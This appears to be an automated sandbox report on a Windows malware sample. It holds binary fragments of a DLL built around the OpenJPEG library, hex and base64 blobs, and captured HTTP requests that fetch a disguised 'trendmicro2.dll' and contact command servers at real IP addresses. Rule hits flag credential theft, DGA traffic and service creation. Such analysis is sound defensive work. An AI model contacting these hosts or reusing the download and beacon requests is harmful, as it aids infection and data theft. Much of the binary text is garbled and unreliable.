D‹L$pL‹ÀH‹T$hH‹Œ$ÀèË!ÿÿëéAÿÿÿHÄ¸ÃÌÌÌÌÌÌÌÌÌÌÌ̉T$H‰L$Hì¸H‹„$ÀH‹€ØH‰„$ˆH‹„$À‹€èƒÀ‹ÀH‹Œ$ÀH‹‰àHH‰D$hH‹„$À‹€è‰D$tH‹„$ÀH‰D$XH‹D$XH‹€ÀH‰D$PH‹D$X‹‰D$@H‹D$X‹@‰D$DH‹D$X‹@‰D$H‹„$ȹ‰Œ$”¶È‹„$”Óà‰„$‹„$Ñø‰„$|‹„$|‹Œ$ ȋÁ‰D$pÇD$|ë4‹D$|ƒÀ‰D$|kD$t‹ÀH‹Œ$ˆHH‰„$ˆH‹D$hHƒÀH‰D$hH‹„$À‹€ìƒàü9D$|ƒÃ'ÇD$xë,‹D$xÿÀ‰D$xH‹„$ˆHƒÀH‰„$ˆH‹D$hHƒÀH‰D$h‹D$t9D$xƒz'H‹D$h‹‰D$dƒ|$d„_'‹D$d% …À…» ‹D$d%ï…À„ª ‹T$dH‹L$Xè¬ÿÿ¶À‰„$€‹„$€H‹L$XHDÁ(H‰D$PH‹D$PH‹‹‹L$D+ȋÁ‰D$D‹D$@ÁèH‹L$PH‹ ;ƒ—H‹D$PH‹‹9D$Ds3H‹D$PH‹‹‰D$DH‹D$PH‹‹@‰D$`H‹D$PH‹H‹L$PH‹@H‰ëSH‹D$PH‹‹‰D$DH‹D$PH‹ƒxu DŽ$ë DŽ$‹„$‰D$`H‹D$PH‹H‹L$PH‹@H‰ƒ|$H…ÅH‹D$XH‹@¶@‰„$H‹D$XH‹@¶=ÿuk¼$v)‹D$@ÿ‰D$@ÇD$HH‹D$X‹@ ÿÀH‹L$X‰A ë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$Áà ‹L$@ȋÁ‰D$@ÇD$Hë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$Áà‹L$@ȋÁ‰D$@ÇD$H‹D$DÑà‰D$D‹D$@Ñà‰D$@‹D$HÿȉD$H|$D€‚ÿÿÿé±H‹D$PH‹‹Áà‹L$@+ȋÁ‰D$@‹D$D%€…À…xH‹D$PH‹‹9D$DsGH‹D$PH‹ƒxu DŽ$ë DŽ$‹„$‰D$`H‹D$PH‹H‹L$PH‹@H‰ë#H‹D$PH‹‹@‰D$`H‹D$PH‹H‹L$PH‹@H‰ƒ|$H…ÅH‹D$XH‹@¶@‰„$”H‹D$XH‹@¶=ÿuk¼$”v)‹D$@ÿ‰D$@ÇD$HH‹D$X‹@ ÿÀH‹L$X‰A ë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$”Áà ‹L$@ȋÁ‰D$@ÇD$Hë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$”Áà‹L$@ȋÁ‰D$@ÇD$H‹D$DÑà‰D$D‹D$@Ñà‰D$@‹D$HÿȉD$H|$D€‚ÿÿÿëH‹D$PH‹‹@‰D$`ƒ|$`„ð¸HkÀ¹HkÉÿE3ÉH‹T$hD‹H‹D$h‹‹L$dè}¦ÿÿ‰„$‹Œ$èJ§ÿÿ¶À‰„$„‹Œ$èT§ÿÿ¶À‰„$ˆ‹„$„H‹L$XHDÁ(H‰D$PH‹D$PH‹‹‹L$D+ȋÁ‰D$D‹D$@ÁèH‹L$PH‹ ;ƒ—H‹D$PH‹‹9D$Ds3H‹D$PH‹‹‰D$DH‹D$PH‹‹@‰D$`H‹D$PH‹H‹L$PH‹@H‰ëSH‹D$PH‹‹‰D$DH‹D$PH‹ƒxu DŽ$ ë DŽ$ ‹„$ ‰D$`H‹D$PH‹H‹L$PH‹@H‰ƒ|$H…ÅH‹D$XH‹@¶@‰„$˜H‹D$XH‹@¶=ÿuk¼$˜v)‹D$@ÿ‰D$@ÇD$HH‹D$X‹@ ÿÀH‹L$X‰A ë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$˜Áà ‹L$@ȋÁ‰D$@ÇD$Hë3H‹D$XH‹@HÿÀH‹L$XH‰A‹„$˜Áà‹L$@ȋÁ‰D$@ÇD$H‹D$DÑà‰D$D‹D$@Ñà‰D$@‹D$HÿȉD$H|$D€‚ÿÿÿé±H‹D$PH‹‹Áà‹L$@+ȋÁ‰D$@‹D$D%€…À…xH‹D$PH‹
Data received $xA‰D$,H‹D$x‹@$ÿÈH‹L$x¯AH‹L$xA‰D$0H‹D$x‹P ‹L$,èIH‹L$p‹Q‹È躉D$,H‹D$x‹P‹L$0è%H‹L$p‹Q ‹Èè–‰D$0H‹D$pH‹@H‰D$ ÇD$(ë ‹D$(ÿÀ‰D$(H‹D$p‹@9D$(ƒÓH‹D$ ‹‹L$<è‰D$4H‹D$ ‹P‹L$@èù‰D$8H‹D$ ‹‹L$,èå‰D$DH‹D$ ‹P‹L$0èЉD$H‹D$4‹L$D+ȋÁH‹L$ ‹Q(‹Èè‰D$L‹D$8‹L$H+ȋÁH‹L$ ‹Q(‹Èèâ‰D$PH‹D$ ‹L$L‰HH‹D$ ‹L$P‰H H‹D$ ‹L$4‰HH‹D$ ‹L$8‰HH‹D$ HƒÀ@H‰D$ éÿÿÿHƒÄhÃÌÌÌÌÌÌH‰T$H‰L$Hƒì8Hƒ|$@uA¸«HÕüH ÞüèQ/3ÀHƒ|$HuA¸¬HêüH óüè./3ÀH‹D$HH‹L$@‹ ‰H‹D$HH‹L$@‹I‰HH‹D$HH‹L$@‹I‰HH‹D$HH‹L$@‹I ‰H H‹D$HHƒxtpÇD$ ë ‹D$ ÿÀ‰D$ H‹D$H‹@9D$ s3‹D$ HkÀ@H‹L$HHAH‰D$(H‹D$(Hƒx0tH‹D$(H‹H0ÿïFëµH‹D$HH‹Hè_ôÿÿH‹D$HHÇ@H‹D$HH‹L$@‹I‰HH‹D$H‹@HkÀ@H‹Èè~òÿÿH‹L$HH‰AH‹D$HHƒxuH‹D$HHÇ@H‹D$HÇ@é ÇD$ ë ‹D$ ÿÀ‰D$ H‹D$H‹@9D$ sL‹D$ HkÀ@H‹L$@HA‹L$ HkÉ@H‹T$HHJA¸@H‹Ðèù5‹D$ HkÀ@H‹L$HH‹IHÇD0ëœH‹D$HH‹L$@‹I‰HH‹D$HH‹L$@‹I(‰H(H‹D$Hƒx(tcH‹D$H‹@(‹Èè£ñÿÿH‹L$HH‰A H‹D$HHƒx uH‹D$HHÇ@ H‹D$HÇ@(ë1H‹D$@‹@(D‹ÀH‹D$@H‹P H‹D$HH‹H èQ5ë H‹D$HHÇ@ HƒÄ8ÃÌÌÌÌÌÌÌÌÌÌÌÌ̉T$‰L$Hƒì‹D$(9D$ s ‹D$ ‰$ë‹D$(‰$‹$HƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̉T$‰L$Hƒì‹D$(9D$ v ‹D$ ‰$ë‹D$(‰$‹$HƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̉T$‰L$Hƒì‹D$ ‹L$(HÁH‰$H‹$HÁè ÷Ø $HƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̉T$‰L$Hƒì(ƒ|$8uA¸¬H0ùH ‰ùè,3À‹D$0‹L$8HDÿ‹L$83ÒH÷ñHƒÄ(ÃÌÌÌÌÌÌ̉T$‰L$‹D$‹L$ºHÓâH‹ÊHDÿ‹L$HÓèÃÌÌÌÌÌÌÌÌD‰D$H‰T$H‰L$HƒìxHÇD$P‹„$Áà‰D$@‹„$Áà‰D$DkD$D‹L$@ȋÁ‰D$HHÇD$`HÇD$X‹D$H‹ÈèŠïÿÿH‰D$PHƒ|$Pu3ÀéËH‹D$PH‰D$`‹D$@H‹L$PHÈH‹ÁH‰D$X‹D$@D‹À3ÒH‹L$`èCD‹Œ$L‹D$XH‹T$`H‹Œ$€è†…ÀuH‹L$PèÈðÿÿ3Àëi‹„$Ñà‹ÀH‹L$XH‹Œ$H‹T$XH ŠH‰D$0H‰L$(H‹D$XH‰D$ L‹L$`D‹„$H‹”$ˆH‹Œ$€è*H‹L$Pè`ðÿÿ¸HƒÄxÃÌÌÌÌÌÌD‰L$ L‰D$H‰T$H‰L$HìˆH‹„$˜H‰D$HÇD$4‹„$¨ÿȉD$l‹„$¨Áà‰D$PH‹„$H‰D$`ÇD$<‹„$¨ÿȉD$XÇD$ ë ‹D$ ÿÀ‰D$ ‹„$¨9D$ sH‹D$H‹L$ ‰H‹D$HHƒÀH‰D$HëÎH‹„$˜H‰D$HÇD$$ë ‹D$$ÿÀ‰D$$‹D$l9D$$ƒWÀóD$0‹D$$H‹L$`HH‰D$(‹D$$‰D$ ë ‹D$ ÿÀ‰D$ ‹„$¨9D$ ƒ€H‹D$(ó/8qvH‹D$(óóD$hëH‹D$(óW5‚óD$hóD$hóD$8óD$8/D$0vóD$8óD$0‹D$ ‰D$4‹„$¨H‹L$(HH‰D$(éeÿÿÿóZD$0f.êz u3Àé-‹D$$9D$4„­‹D$4H‹L$HH‹L$$HÁáH+ÁH‰D$xH‹D$H‹‰D$pH‹D$HH‹L$x‹ ‰H‹D$x‹L$p‰‹D$$‹L$4+ȋÁ¯„$¨‹ÀH‹L$`HH‰D$(‹D$PD‹ÀH‹T$(H‹Œ$ èc0‹D$PD‹ÀH‹T$`H‹L$(èM0‹D$PD‹ÀH‹”$ H‹L$`è40‹D$$H‹L$`HH‰D$@‹„$¨H‹L$@HH‰D$(H‹D$@óóD$8H‹D$@HƒÀH‰D$@‹D$<‰D$ ë ‹D$ ÿÀ‰D$ ‹„$¨9D$ ƒÈH‹D$(óó^D$8óD$0H‹D$(óD$0óH‹D$(HƒÀH‰D$(‹D$<‰D$Të ‹D$TÿÀ‰D$T‹„$¨9D$TsFH‹D$@óD$0óYH‹D$(óó\È(ÁH‹D$(óH‹D$@HƒÀH‰D$@H‹D$(HƒÀH‰D$(룋D$XHÁàH‹L$@H+ÈH‹ÁH‰D$@‹D$$H‹L$(HH‰D$(éÿÿÿ‹D$<ÿÀ‰D$<‹D$XÿȉD$X‹„$¨H‹L$`HH‰D$`H‹D$HHƒÀH‰D$Héçüÿÿ¸HÄˆÃÌÌÌÌÌÌÌÌÌÌL‰L$ L‰D$H‰T$H‰L$Hìˆ‹„$°ÿÀ‰D$LH‹„$˜H‰D$@‹„$°H‹Œ$HDüH‰D$hH‹„$¨H‰D$XH‹„$¸H‰D$P‹„$°H‹Œ$¸HDüH‰D$pÇD$0ë ‹D$0ÿÀ‰D$0‹„$°9D$0ƒÚWÀóD$$H‹„$¸H‰D$8H‹D$@H‰D$(ÇD$ ë ‹D$ ÿÀ‰D$ ‹D$09D$ wCH‹D$(H‹L$8óóYóL$$óXÈ(ÁóD$$H‹D$8HƒÀH‰D$8H‹D$(HƒÀH‰D$(ë©H‹D$X‹H‹Œ$ óó\D$$H‹D$PóH‹D$PHƒÀH‰D$PH‹D$XHƒÀH‰D$X‹„$°H‹L$@HH‰D$@é ÿÿÿ‹„$°¯„$°‹ÀH‹Œ$˜HDüH‰D$@‹„$°H‹Œ$HH‰D$`ƒ¼$°uA¸üH–òH §òè¢$3À‹„$°ÿȉD$4ë ‹D$4ÿȉD$4ƒ|$4ÿ„WÀóD$$H‹D$@H‰D$(H‹D$(óóD$HH‹D$(HƒÀH‰D$(H‹D$`H‰D$8H‹D$`HƒèH‰D$`‹D$4ÿÀ‰D$ ë ‹D$ ÿÀ‰D$ ‹„$°9D$ sCH‹D$(H‹L$8óóYóL$$óXÈ(ÁóD$$H‹D$8HƒÀH‰D$8H‹D$(HƒÀH‰D$(ë¦H‹D$póó\D$$ó^D$HH‹D$hóH‹D$hHƒèH‰D$hH‹D$pHƒèH‰D$p‹D$LHÁàH‹L$@H+ÈH‹ÁH‰D$@éæþÿÿHÄˆ
Data received ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌL‰L$ D‰D$H‰T$H‰L$HƒìXH‹D$hH‰D$@‹D$pÁà‰D$8ÇD$0ë ‹D$0ÿÀ‰D$0‹D$p9D$0ƒÌH‹D$@H‰D$HH‹D$@HƒÀH‰D$@‹D$8D‹À3ÒH‹Œ$€èã:‹D$0H‹Œ$€óÃjóH‹„$H‰D$(‹D$p‰D$ L‹L$xL‹„$€H‹T$`H‹Œ$ˆèüÿÿÇD$4ë ‹D$4ÿÀ‰D$4‹D$p9D$4s.‹D$4H‹L$HH‹”$ˆó‚ó‹D$pH‹L$HHH‰D$Hë¾éÿÿÿHƒÄXÃ3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌ̸ÃÌÌÌÌÌÌÌÌÌÌ3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌÌ3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‰L$ÃÌÌÌÌÌÌÌÌÌ̉T$H‰L$HƒìÇ$ë‹$ÿÀ‰$H‹D$ ‹@9$}2Hc$HkÀH‹L$ H‹ ‹T$(9uHc$HkÀH‹L$ H‹ H‹Dëë¹3ÀHƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌL‰L$ L‰D$‰T$H‰L$Hƒì8H‹D$@xÿÿÿu3ÀétÇD$ ë ‹D$ ÿÀ‰D$ H‹D$@‹@9D$ ¨HcD$ HkÀH‹L$@H‹ ‹T$H9……HcD$ HkÀH‹L$@H‹ Hƒ|t,HcD$ HkÀH‹L$@H‹ HcT$ HkÒL‹D$@M‹H‹LAÿTHcD$ HkÀH‹L$@H‹ H‹T$PH‰THcD$ HkÀH‹L$@H‹ H‹T$XH‰T¸é«é<ÿÿÿH‹D$@Hc@HÿÀHkÀ
Data received $P‹ƒÀH‹L$P‰H‹D$@‹L$ ‰H‹D$@ƒ8uL¤˜ºH‹L$`èÿÿ3ÀëUë$H‹D$@ƒ8uL¦˜ºH‹L$`èïÿÿ3Àë/H‹D$@H‹L$P‹ 9sL¤˜ºH‹L$`èÅÿÿ3Àë¸HƒÄ8ÃÌÌÌÌÌÌÌH‰T$H‰L$Hƒì(Hƒ|$0uA¸T H™H ¦™è¡¡3ÀHƒ|$8uA¸U H¢™H «™è~¡3À¸HƒÄ(ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$Hƒì(Hƒ|$0uA¸† HݙH æ™è1¡3ÀHƒ|$8uA¸‡ Hâ™H ë™è¡3ÀL‹D$8HíÿÿH‹D$0H‹Hèâ=ûÿ…Àu3Àë¸HƒÄ(ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌL‰D$H‰T$H‰L$HƒìhH‹D$xHƒx„ûH‹D$xH‹@H‹H‰D$HH‹D$xH‹@·@f‰D$DH‹D$p‹@‰D$@H‹D$xHƒxt!H‹D$xH‹@HƒxtH‹D$xH‹@¶@"‰D$@3Àf‰D$0ë ·D$0fÿÀf‰D$0·D$0·L$D;Áë·D$0HkÀH‹L$H·;D$@r=·D$0HkÀH‹L$H·‹L$@‰L$ D‹ÈLmyºH‹Œ$€è»ÿÿ3ÀéZ·D$0HkÀH‹L$H·D=ÿÿuémÿÿÿ·D$0HkÀH‹L$H·D…À~[·D$0HkÀH‹L$H·DÿÈ;D$@r@·D$0HkÀH‹L$H·DÿȋL$@‰L$ D‹ÈLyºH‹Œ$€è*ÿÿ3ÀéÉéöþÿÿƒ|$@†3Àf‰D$0ë ·D$0fÿÀf‰D$0·D$0·L$D;Á} ·D$0HkÀH‹L$H·‹L$@ÿÉ;ÁuëëÅ·D$0·L$D;Áu LªxºH‹Œ$€è¨ÿÿ3ÀéG‹D$@ÿȉD$@étÿÿÿH‹D$xHƒx„#H‹D$xH‹@Hƒx„H‹D$xH‹@¶@"f‰D$8H‹D$xH‹@H‹@H‰D$PÇD$<3Àf‰D$0ë ·D$0fÿÀf‰D$0·D$0·L$8;Á}X·D$0H‹L$P·H‹L$p;Ar>·D$0H‹L$P·H‹L$p‹I‰L$ D‹ÈLúwºH‹Œ$€èÐ ÿÿÇD$<덷D$8º‹Èè5bÿÿH‰D$XHƒ|$Xu LáwºH‹Œ$€è ÿÿ3Àé.3Àf‰D$0ë ·D$0fÿÀf‰D$0·D$0·L$8;Á¥·D$0H‹L$P¶DˆD$5·D$0H‹L$P¶DˆD$4¶D$5…ÀtA¶D$5ƒøt7¶D$5·L$0‰D$ D‹ÉLgwºH‹Œ$€èý ÿÿÇD$<é0¶D$4·L$8;Á|.¶D$4D‹ÈLSwºH‹Œ$€èÁ ÿÿÇD$<éô¶D$4H‹L$Xƒ<t8¶D$5ƒøu.
Data received get_decoded_tileopj_get_num_cpusopj_has_thread_supportopj_image_createopj_image_data_allocopj_image_data_freeopj_image_destroyopj_image_tile_createopj_read_headeropj_read_tile_headeropj_set_MCTopj_set_decode_areaopj_set_decoded_componentsopj_set_decoded_resolution_factoropj_set_default_decoder_parametersopj_set_default_encoder_parametersopj_set_error_handleropj_set_info_handleropj_set_warning_handleropj_setup_decoderopj_setup_encoderopj_start_compressopj_stream_createopj_stream_create_default_file_streamopj_stream_create_file_streamopj_stream_default_createopj_stream_destroyopj_stream_set_read_functionopj_stream_set_seek_functionopj_stream_set_skip_functionopj_stream_set_user_dataopj_stream_set_user_data_lengthopj_stream_set_write_functionopj_versionopj_write_tile8pˆt0¸rÈrÚrìrürs2sFs`stss®sÂsÖsòstt8tNtbttt€x–tªt¼tÊtâtòtuu*uBuZu‚uŽuœuªu´uÂuÔuâuøuvv,v<vHvTv`vnv€vv¢v²vÆvÒvèvøv w"w0w<wPw`wrw|wˆw”w¦w¸wÎwäwþwx2xDxTxfxtxÙVirtualAllocßVirtualProtect¸GetProcAddressÈLoadLibraryARQueryPerformanceCounterSQueryPerformanceFrequencyÕRtlCaptureContextÜRtlLookupFunctionEntryãRtlVirtualUnwindÀUnhandledExceptionFilterSetUnhandledExceptionFilter GetCurrentProcessžTerminateProcessŒIsProcessorFeaturePresent!GetCurrentProcessId%GetCurrentThreadIdóGetSystemTimeAsFileTimeoInitializeSListHead…IsDebuggerPresentÚGetStartupInfoWGetModuleHandleWKERNEL32.dllÞRtlPcToFileHeaderhRaiseExceptionâRtlUnwindExsInterlockedFlushSListjGetLastErrorASetLastError4EncodePointer8EnterCriticalSectionÄLeaveCriticalSectionDeleteCriticalSectionkInitializeCriticalSectionAndSpinCount°TlsAlloc²TlsGetValue³TlsSetValue±TlsFree´FreeLibraryÊLoadLibraryExWgExitProcess€GetModuleHandleExWÜGetStdHandleXGetFileType}GetModuleFileNameW$WriteConsoleWyReadFileUHeapFreeQHeapAllocXHeapReAllocžCompareStringW¸LCMapStringWGetConsoleModevReadConsoleW¨FlushFileBuffers%WriteFile GetConsoleOutputCPVGetFileSizeEx3SetFilePointerExOutputDebugStringW‰CloseHandle~FindClose„FindFirstFileExW•FindNextFileW’IsValidCodePage»GetACP¡GetOEMCPÊGetCPInfoßGetCommandLineAàGetCommandLineWöMultiByteToWideCharWideCharToMultiByteAGetEnvironmentStringsW³FreeEnvironmentStringsW$SetEnvironmentVariableW¾GetProcessHeap[SetS
Data received 248173665a04837e6d9aa2810a0f2fbc46e476e73a720884e123266a24932eedda92a11a0f3fac06f446e7aa2258049173764a44836e3d1ae2b12a1f2fac769476a72a7278648163761a04936e2d9ab2811a0f3fbc56f446977a7278249163265a14e3de0dcae2b12a1f0fec56e446f72a7278648163563a24937e7d9ab2811a0f3f8c26d446b73ae299140103060a44a36e1d4a72118a7f4fac46e446f72a725844a163664a04931ecdfaf2c13a2f3fece65436e73a627804d163763aa4e32e2daa82913a6f0fac46e406376a524834816336da44b35e7d9ab2a15a1f3fac06f446b73a627864f143464a14a32e7d8ab2c10a1f0fec56e446f72a725844a163664a54033e5dbab2811a2f7fac56f446b72a6305c48171e65a14832e6dcaa1c10e8f2a7c41b28451ea6268948d03660a04037f2d9cc2868a072fb566fe36b72a724814c535a00e3294484bcde6c7cc19cbfa80a2c1f00c350f00c7b5800c93c4583afd87b71d4f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a626be48173665a0103702d9e62810a0f2fb746fb16b72a6268248173665a048bbe6d9aab210a0f255c46f45d772a6265248173685a048371ed9aa2800a0f2fbe06f456b48a6268218173665c04837e6adaa281026f2fbc4cf456b7216268248db3665a0ac37e6d95e2810a0fcfbc46f5f6b72a6168248177265a04869e6d9aa5a10a0f26bc46f45f372a6262e481736dfa0483730d9aa28f6a0f2fb3c6f456b7aa6268248173665b44837e6fbaa281090f2fbc451456b72ec268248453665a01437e6d9cc2810a09cfbc46f3d6b72a6a6824817bc65a048a3e6d9aab610a0f253c46f45d972a6263e481736a3a04837e6d9aa289ca0f2fb5e6f456bdca62682f4173665704837e639aa281058f2fbc47f456b72822682482d3665a01837e6d9ca2810a086fbc46fc36b72a6868248178665a048fbe6d9aacc10a0f20fc46f456572a6269848173655a04837a2d9aa284ea0f2fbb66f456be2a62682d01736650c4837e663aa281076f2fbc489456b725e2682481f3665a04837e6d9be2810a0d0fbc46f756b72a6188248177c65a04865e6d9aa7410a0f29dc46f450572a626fa481736e5a048376cd9aa2884a0f2fb5a6f456bdaa62682fa1736651c4837e61faa2810a0f2fbc43a060417c742e720545800d42952b6a9aaa453c586bda82ee62817d268ef2c7e5365190b52928dd8491077b697b02c2c0213f545eb26e07311d23a4385b5cf5c7fa03ebcb01a370522c943f185504210d2266789bcd94cc1e7868eb601111913ef268d0f635711d22737c59ede4765c5939fa16f102c06d445e63a6436ece73c4e92b4c34d63c99792a1cc021f1bcd49ec48e07f0cc9244da5b0c34943c39b958d23240e00d245ee2d635965ef0456aabbcb511018a39ebd0a231913c565f73c65e437c10e5be627f84474e69c8fab3b270e8df44ae33c65750bc53c31b4b5c54360d59192aa01376b7ff44aeb3c766312ce48abb5adc44974c5b798b4062b0206d48fd12d678131d2215683abc95b101ea688a139290eb9f34eec24734e00d427718abcaacb46d28797a800458224d453ee3a6355654b1e4593b5df5a10bfa592a10620252dc24aec3063653ac92a5188d9d3777dc79792c4461a0506c34b1217785d53ff264f9207f5467fcb549aab1bf1081ec926562e7236bac63a43e6d5c7447fa0e696a91f455901c147827d64440bc60e4494bcaa6163d2918bad19350206a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b39f463b1667b3665b44823e6cdaa3c10b4f2efc47b457f72b2269648033671a05c37f2d9be2804a0e6fbd06f281d00884a8248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248bb3665a04837e6d9aa2810b05efbc48fe96b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2
Data received 810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2ba686f452fdea6269ee41736550c4837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbc46f456b72a6268248173665a04837e6d9aa2810a0f2fbH”0633436663435366237326136323638323438313733363635613034383337653664396161323831306130663266626334366634353662373261363236383234383137333636356130343833376536643961613238313061306632666263343666343536623732613632363832343831373336363561303438333765366439616132383130613066326662633436663435366237326136323638323438313733363635613034383337653664396161323831306130663266626334366634353662373261363236383234383137333636356130343833376536643961613238313061306632666263343666343536623732613632363832343831373336363561303438333765366439
Data received 2k.cp_manager != 00j2k.cp_stream != 00Not enough memory to write POC marker j2k.cp_j2k != 00j2k.cp_manager != 00j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading POC marker Too many POCs %d j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading CRG marker j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading TLM marker Error reading TLM marker j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading PLM marker j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading PLT marker Error reading PLT marker j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading PPM marker j2k.cl_cp->ppm_markers_count == 0UNot enough memory to read PPM marker Not enough memory to read PPM marker Zppm %u already read Not enough memory to read PPM marker j2k.cp_cp != 00j2k.cp_manager != 00j2k.cp_cp->ppm_buffer == NULLNot enough bytes to read Nppm Corrupted PPM markers Not enough memory to read PPM marker Not enough bytes to read Nppm j2k.cp_header_data != 00j2k.cp_j2k != 00j2k.cp_manager != 00Error reading PPT marker j2k.c } Error reading PPT marker: packet header have been previously found in the main header (PPM marker). l_tcp->ppt_markers_count == 0UNot enough memory to read PPT marker Not enough memory to read PPT marker Zppt %u already read Not enough memory to read PPT marker j2k.cp_tcp != 00j2k.cp_manager != 00opj_j2k_merge_ppt() has already been called Not enough memory to read PPT marker j2k.cp_j2k != 00j2k.cp_manager != 00j2k.cp_stream != 00Not enough memory to write TLM marker j2k.cp_j2k != 00j2k.cp_manager != 00j2k.cp_stream != 00Not enough bytes in output buffer to write
Data received HTTP/1.1 200 OK Date: Mon, 1 Nov 2021 02:10:59 GMT Server: Apache Content-Length: 199368 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain
Data received HTTP/1.1 200 OK Date: Mon, 1 Nov 2021 02:10:59 GMT Server: Apache Content-Length: 199408 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: text/plain
Data received qBdvHPslM2HP+EavzeTF+Ea6wIK+v+H3/IGncxIXP2myd/ddQ9kNLtHAnokgE3bdSY71fLD2Snd25d6668+l4Y1blZ41ssfoV2+uHxT+Yktu6/vaDf3PoOff0acp+SLyFfQ1I65a1ki3CzT4i7cvrHHG9J/e7ojPB/76eutiaE/NX1/26xnjnqMT6IkOxjmNoe12T4f8KPz0uzPxCmOo9A6Ly5uvkH4tj6rrX9sk9t68ibDytOZ9NfNXf7HaDU6d7Drz245+3086f6X/2si3gtYqpBrlMC/QKwf5lWN6xhzn6wzCc1Of/4B2ga6+vvQ9qg3IW1s9zqk2P+2RGBmXpSE7HThTMr2zecA9zhg+Gm1S81D9tZ//4NibfZfHt+Bbr/1psOwjnMekrL/sE+l9P777ZvRl02q0VjOh0edh/3emFGxV4Jt87Wz5fRbB
Data received /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;w.fn=w.prototype={jquery:"3.3.1",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushSt
Data sent GET /load/trendmicro2.dll HTTP/1.1 Host: 194.5.212.190 Connection: Keep-Alive
Data sent GET /home HTTP/1.1 Host: 108.62.12.61:99 Connection: Keep-Alive
Data sent GET /home2 HTTP/1.1 Host: 108.62.12.61 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://108.62.12.61:99/home
url http://108.62.12.61:80/home2
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Steal credential rule local_credential_Steal
description Communications use DNS rule Network_DNS
description Match Windows Inet API call rule Str_Win32_Internet_API
